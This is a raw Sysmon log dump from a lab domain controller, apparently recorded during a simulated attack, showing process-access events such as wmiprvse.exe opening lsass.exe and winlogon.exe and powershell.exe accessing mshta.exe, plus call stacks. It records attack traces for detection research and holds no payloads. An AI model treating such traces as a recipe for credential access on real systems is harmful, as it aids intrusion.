16:58:30.358{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246704Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.358{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246703Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.358{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246702Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.358{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246701Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.343{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d647e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3c23(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65458(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64) 10341000x80000000000000002246700Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.343{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3b24|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d647e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3c23(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65458(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64) 23542300x80000000000000002246699Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.343{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86B178313C25663295A92475B786F964,SHA256=2AE8E29973826FE6C40C7DEC2EC0877511B688BD7686DB5E3E35F54F20C0AF70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002246698Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.327{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=79B6E37BB6BF67A7E58454F43656AC22,SHA256=04BFF673C19DC104C271CAE42ED8E8EED70BE35D4654A58E48A31789F32FEA8C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002246697Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.327{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246696Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.327{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6E3D-603E-04AB-00000000AD01}6348C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246695Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.327{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6E3D-603E-03AB-00000000AD01}6688C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246694Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.327{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246693Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.327{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246692Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.312{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246691Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.312{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246690Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.312{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246689Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.312{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246688Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.312{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\S